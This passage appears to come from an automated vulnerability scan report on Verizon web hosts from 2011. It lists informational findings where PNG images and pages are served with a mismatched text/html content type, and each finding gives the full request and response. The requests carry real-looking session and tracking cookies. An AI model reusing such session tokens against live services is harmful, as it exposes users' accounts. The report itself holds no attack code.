Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_05.png

Request

GET /headlines/resources/images/navOff_05.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 574
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...;.........~..[....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V.m. ..U..#..................f.FhV`...zD'....O.....q......zU.........-`.W{_........{'..}...l!.w[#..mG..
...[SNIP]...

24.20. http://headlines.verizon.com/headlines/resources/images/navOff_06.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_06.png

Request

GET /headlines/resources/images/navOff_06.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 547
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...A..........|.
....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W...0.MO]..X..`.t...F..`.F(#.+0B........D....l...q0..9.i.6.....).
... <....UU....}?;.........&.%.-....
...[SNIP]...

24.21. http://headlines.verizon.com/headlines/resources/images/navOff_07.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_07.png

Request

GET /headlines/resources/images/navOff_07.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 503
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...:............e....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W...0..S....
Y!7.+..0...FhF(#...#.#pv.|.Yp.....K..qB^....4M.+.[."..F......_@Y..=....m.......Av..|.'..;Y
...[SNIP]...

24.22. http://headlines.verizon.com/headlines/resources/images/navOff_08.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_08.png

Request

GET /headlines/resources/images/navOff_08.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 441
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...0.................gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...KIDATx..V.m. ......+..v.;..PG.#.... +..+0../.....V.._.%/ ...qGT....l/..[....w..[.]...Z1.....,...=.mY'...m..n.8.
...[SNIP]...

24.23. http://headlines.verizon.com/headlines/resources/images/navOn_01.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOn_01.png

Request

GET /headlines/resources/images/navOn_01.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 1288
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...S..........'......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..WKo.H..;.8.L.a..J.j.. .w$.'.8.'V .....C.IPx.x\ 7..!n....V".....DrA+m..0....c.....=.{C .=....].U_U.c[.
...[SNIP]...

24.24. http://headlines.verizon.com/headlines/resources/images/pageTitleHeadlines.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/pageTitleHeadlines.png

Request

GET /headlines/resources/images/pageTitleHeadlines.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:26 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 929
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...a.........5..N....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...3IDATx..W..!A.]JBHHH*...T*..7..PJ(......r....s...u....Z.......jv.w......8.....x<z.W(......v...{.r.\6....RI}<..
...[SNIP]...

24.25. http://headlines.verizon.com/headlines/resources/images/primaryNavPipe.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/primaryNavPipe.png

Request

GET /headlines/resources/images/primaryNavPipe.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:17:16 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 193
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...............M.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...SIDATx.b...?....={VDJJ....a...1...    cpcH...?...L..C.......    ..    &..3....o@...x.z....0..-..........IEND.B`.

24.26. http://headlines.verizon.com/headlines/resources/images/twit_pipe.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/twit_pipe.png

Request

GET /headlines/resources/images/twit_pipe.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:10:28 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 318
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR.............l..'....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....
.0.E.R.d....c.!X..<nG1 ...o......[R`G\N...I....w.........*R.+x(......H.FH.z...q.I.5PDQ...bt.G...5p
...[SNIP]...

24.27. http://headlines.verizon.com/headlines/resources/images/verizonEmail.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/verizonEmail.png

Request

GET /headlines/resources/images/verizonEmail.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:10:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 868
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...`.........?.......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y=..@...D...D......cJ..?..!.\D....(I..E..D../..D.@Jq.%~.........4.7.'q.;...._..ff...i.N...k....@@.@@
...[SNIP]...

24.28. http://phones.verizonwireless.com/htc/thunderbolt/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phones.verizonwireless.com
Path:   /htc/thunderbolt/

Request

GET /htc/thunderbolt/ HTTP/1.1
Host: phones.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2011 02:52:27 GMT
Accept-Ranges: bytes
ETag: "ec1b210d141cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 8159
Date: Mon, 05 Sep 2011 22:19:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
<t
...[SNIP]...

24.29. http://promo.verizon.com/omk/online.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://promo.verizon.com
Path:   /omk/online.shtml

Request

GET /omk/online.shtml HTTP/1.1
Host: promo.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#sclient=psy&hl=en&source=hp&q=site:verizon.com+online+news+webmail&pbx=1&oq=site:verizon.com+online+news+webmail&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4585l6285l1l6781l2l2l0l0l0l0l144l261l0.2l2l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
